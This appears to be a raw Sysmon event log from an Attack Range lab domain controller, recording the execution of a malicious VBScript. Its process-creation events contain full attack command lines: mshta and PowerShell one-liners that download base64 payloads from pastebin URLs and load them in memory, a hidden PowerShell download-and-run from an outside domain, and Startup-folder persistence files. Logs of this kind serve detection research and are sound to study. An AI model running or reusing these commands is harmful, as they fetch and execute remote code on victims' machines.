07:59:20.119{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106315Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.119{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106314Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.119{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B458-615A-2302-00000000FC01}6876C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106313Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.119{58E9C193-B457-615A-1702-00000000FC01}16921584C:\Windows\System32\cmd.exe{58E9C193-B458-615A-2302-00000000FC01}6876C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106312Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.121{58E9C193-B458-615A-2302-00000000FC01}6876C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B457-615A-1702-00000000FC01}1692C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106311Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.114{58E9C193-B458-615A-2002-00000000FC01}53245964C:\Windows\system32\conhost.exe{58E9C193-B458-615A-1F02-00000000FC01}424C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106310Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.114{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106309Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.114{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106308Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.114{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106307Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.114{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106306Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.114{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106305Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.114{58E9C193-B457-615A-1602-00000000FC01}20004580C:\Windows\System32\WScript.exe{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106304Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.114{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/pic.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\love01.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\love01.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106303Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.097{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B458-615A-2002-00000000FC01}5324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106302Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.097{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1E02-00000000FC01}5584C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106301Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 07:59:20.097{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\docWS.vbs2021-10-04 07:44:22.112 23542300x8000000000000000106300Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.097{58E9C193-B457-615A-1602-00000000FC01}2000ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\docWS.vbsMD5=F11AF900F15215D81245B000809E7BE8,SHA256=79152EFEFD6F3C958CDB4B2FAA6FF2A1F18FAB55EBE28B9873154DEC9BBA37EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106299Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.097{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1E02-00000000FC01}5584C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106298Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.091{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1C02-00000000FC01}4336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106297Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.090{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1C02-00000000FC01}4336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106296Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.086{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106295Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.086{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106294Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.086{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106293Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.086{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106292Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.084{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B458-615A-1F02-00000000FC01}424C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106291Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.082{58E9C193-B457-615A-1602-00000000FC01}20005296C:\Windows\System32\WScript.exe{58E9C193-B458-615A-1F02-00000000FC01}424C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106290Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.081{58E9C193-B458-615A-1F02-00000000FC01}424C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106289Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.082{58E9C193-B458-615A-1E02-00000000FC01}55842228C:\Windows\system32\conhost.exe{58E9C193-B458-615A-1D02-00000000FC01}4292C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106288Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.074{58E9C193-B458-615A-1C02-00000000FC01}43365720C:\Windows\system32\conhost.exe{58E9C193-B458-615A-1B02-00000000FC01}5292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106287Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.074{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1A02-00000000FC01}5448C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106286Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.074{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-1A02-00000000FC01}5448C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106285Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 07:59:20.066{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsgsdgsdgsdg.vbs2021-10-04 07:44:22.097 23542300x8000000000000000106284Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.066{58E9C193-B457-615A-1602-00000000FC01}2000ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsgsdgsdgsdg.vbsMD5=F11AF900F15215D81245B000809E7BE8,SHA256=79152EFEFD6F3C958CDB4B2FAA6FF2A1F18FAB55EBE28B9873154DEC9BBA37EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106283Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.058{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B458-615A-1E02-00000000FC01}5584C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106282Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 